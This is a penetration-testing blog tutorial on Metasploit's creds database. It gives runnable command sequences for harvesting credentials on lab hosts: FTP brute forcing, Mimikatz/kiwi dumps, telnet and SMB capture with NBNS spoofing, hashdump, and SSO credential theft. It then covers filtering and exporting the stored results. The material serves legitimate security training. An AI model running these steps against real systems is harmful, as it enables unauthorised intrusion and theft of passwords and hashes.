This is in continuation with the Metasploit for Pentester series of articles that we are presenting. More specifically we learned about the Workspaces and the Metasploit Database service in this article: Metasploit for Pentester: Database & Workspace. In this article, we will be discussing another database inside the Workspace that can be used by Penetration Testers: Creds.
Table of Content
·
Recap and DB Initialization
·
Introduction
·
Extracting Creds
o
From Bruteforce
o
From Mimikatz
o
From Telnet
o
From SMB
o
From Hashdump
o
From SSO
·
Search Filter
o
By Username
o
By Type
o
By Port
o
By Host
o By Service
·
Adding Credentials
·
Exporting Credentials
·
Conclusion
Recap and DB Initialization
Without repeating but having a small recap
of the facts that we learned in the Workspace article that, Metasploit has a
Postgres SQL database at its disposal inside which Penetration Testers can
create Workspace for their usage. This Workspace has some sub-sections such as
the hosts and vulns that hold the various hosts enumerated by the users with
the help of the db_nmap and Metasploit auxiliaries. Among those databases, we
have another type of database that is called creds. Before beginning, with its functionalities,
let’s initiate the database with the help of the following command.
msfdb init
Introduction
After initializing, just by running the
creds command, we can see the table that will hold the data enumerated by the
user. It contains the following columns: hosts for holding the primary key
i.e., IP Addresses of the targeted hosts, the origin will store the location
where we were able to grab the creds from, service will feature the particular
service running on the hosts that made it possible to the extraction of the
creds, public and private are just the holders for the public variable which in
most cases is the username and private as you might have guessed it the
password. We have some other columns that we will get into later. However, we
have a column by the name of JtR Format. It will contain the format that can be
used with John the Ripper tool to decode.
creds
Extracting Creds: Bruteforce
We discussed in the Introduction section
that the creds table will populate with the correct credentials that we
enumerate using the auxiliaries from Metasploit. To demonstrate the collection
of creds from Bruteforce, we will be targeting the FTP service running on a
server. We used the ftp_login exploit to attempt to Bruteforce the credentials.
We provided the host with the User File with the possible usernames, pass a file
with possible passwords. After running through, the list of usernames and
passwords, the exploit was able to grab the correct credentials as username
privs and password 123. After successful extraction of the credentials, we ran
the creds command and we can observe that the creds table has its very first
entry as demonstrated in the image below
use auxiliary/scanner/ftp/ftp_login
set rhosts 192.168.1.40
set user_file /root/users.txt
set pass_file /root/pass.txt
set verbose false
set stop_on_success true
exploit
creds
Extracting Creds: Mimikatz
We are not going to use the Mimikatz
directly on our target but we will be using the Meterpreter external extension
called kiwi. To use Mimikatz, we will be initially compromising a Windows
Machine and gain a meterpreter session on it. After gaining the meterpreter, we
will load the kiwi module and run the creds_all command to gain all the
possible credentials. Passwords, hashes from the compromised machine. We can
see that we can enumerate the NTLM hashes and some clear text passwords with
the help of the kiwi module.
load kiwi
creds_all
Let’s run the creds command again to see if
the recently enumerated creds are populated inside the table. We can observe
that we have the clear text password and the NTLM hashes added into the creds
table. We can see that the host that we extracted the NTLM hash is the Windows
Machine running with the IP Address of 192.168.1.21 and the FTP service was
running on the machine with the IP Address 1922.168.1.40
Extracting Creds: Telnet
Moving on from the FTP service and the NTLM
hashes, it’s time to extract some telnet credentials with the help of another
Metasploit auxiliary called capture/telnet. We are targeting the machine with
the IP Address of 192.168.1.3 and we can see that the captured credentials are
ignited/123. As always running the creds command can confirm that the creds
table is successfully populated with the Telnet credentials.
use auxiliary/server/capture/telnet
set srvhost 192.168.1.9
exploit
creds
Extracting Creds: SMB
Next, we will be targeting the Windows
Machine with the SMB capture and generate the response to capture the NTLM
hashes. We will be using the
auxiliary/server/capture/smb and auxiliary/spoof/nbns/nbns_response exploits to
get the NTLM hashes. We provided the host for serving the capture and the path
to the john password file to be saved. Also, we provided the spoof IP Address
and we have the NTLM hashes as shown in the image below.
use auxiliary/server/capture/smb
set srvhost 192.168.1.9
set johnpwfile /root/Desktop
exploit
use auxiliary/spoof/nbns/nbns_response
set spoofip 192.168.1.9
set interface eth0
exploit
Since we were successful in capturing the
NTLM hashes from the target machine, these will automatically populate the
creds table. We can check these entries by running the creds command as shown
in the image below.
Extracting Creds: Hashdump
Moving on from NTLM hashes on Windows to
Hashes on Linux machines. To enumerate the hashes, we will be using the
Hashdump post-exploitation module on Metasploit. After exploiting a Linux
Machine, we can use this post-exploitation module to gather all the hashes of
the users on the compromised machine. We can see from the image below that the
extracted hashes have been added to the creds table.
use post/linux/gather/hashdump
set session 3
exploit
It is not always necessary to run the post-exploitation
module as demonstrated above. Meterpreter has the command that we can directly
from the meterpreter shell called hashdump. It lists all the extracted hashes
as shown in the image.
hashdump
When we go back to the Creds database we can see that it will have the hashes recovered from the hashdump post-exploitation module and the hashdump meterpreter command that we just ran.
Extracting Creds: SSO
Next, we will be targeting the Domain
Controlled Windows System and try to capture the SSO credentials programmed on
it. We will use the post-exploitation
module windows/gather/credentials/sso. We can see from the image below that the
SSO password for Nisha User was extracted successfully.
use post/windows/gather/credentials/sso
set session 1
exploit
Let’s check if the SSO credentials for
Nisha users that we just extracted make their way into the Creds database.
After running the creds command we can see that it contains the SSO credentials
as well.
Search Filter: Username
While working with multiple targets across
a dense network of machines, it becomes difficult to identify and search for a
particular set of credentials. Creds have the option to sort the data according
to your requirement. Starting with the basic filter of username. Identifying a
set of credentials with the username is such a standard as lock and key. With
the help of the -u option we can sort the creds table with a particular
username. In the demonstration below we are searching for the credentials with
the username raj.
creds -u raj
Search Filter: Type
The next search filter that we are going to
explore is the searching by the type of credentials. To understand this, we need
to understand the categorization that is employed by the creds to sort different
types of credentials. When we enumerated the NTLM hashes it categorized itself
as the NTLM type credentials. Hence, when we use the -t option with NTLM we can
get all the captured hashes as shown in the image below.
creds -t ntlm
Search Filter: Port
Moving on from the type of credentials to
the port from which the credential is extracted. We know that we can extract
the credentials from a particular service. This service must be running on a
specific port. To use that port number to sort through the creds table we can
use the option -p followed by the port number that you want to use for
searching for credentials. In the demonstration below, we are searching for
credentials that are extracted from port 23.
creds -p 23
Search Filter: Host
The next search filter that we are going to
explore is the searching by the host of credentials. These are hosts from which
the credentials originated or the hosts from which the credentials are
extracted. When used the -O option with
the IP Address of the hosts, it will list all the credentials that were
extracted from that particular host as shown in the image below.
creds -O 192.168.1.136
Search Filter: Service
After sorting from various hosts, ports,
types, and usernames at last we come to the filter where we can sort the
credentials by service that they were extracted from. This is similar to the
one that we did with the port. But as we know that it is not always necessary
that the services are running on their default ports. Hence, targeting via the
Service name is an optimal strategy.
creds -s ftp
Adding Credentials
We introduced some odd three-four methods
to add the credentials into the creds table. But even if those are not
sufficient and you want particular credentials in your database. You have the
choice to add it manually. It requires the user tag and the password tag. In
the demonstration below, we are adding the credentials for the user Pavan.
Exporting Credentials
As we discussed in the previous article
about the hosts and workspace, we exported the contents of their database into
a CSV file for reporting and other purposes. The Creds command is not untouched
by this functionality. If you want to export the data from the Creds database
into a CSV file, you can do so by using the -o option followed by the file name
as shown below.
creds -o raj.csv
Conclusion
This was a learning experience as when we
start with the Penetration Activities, we tend not to focus on the
documentation process or providing you work a proper structure and backup. But
with time and some incidents where lack of these qualities proves to be
valuable. The Creds database functionality of Metasploit is not a new feature,
it has been on for years and yet the general usage of these in real life seems
very less. Hence, it inspired us to provide the guide, so that lots of
Penetration Testers can use it and benefit from it.
0 comments:
Post a Comment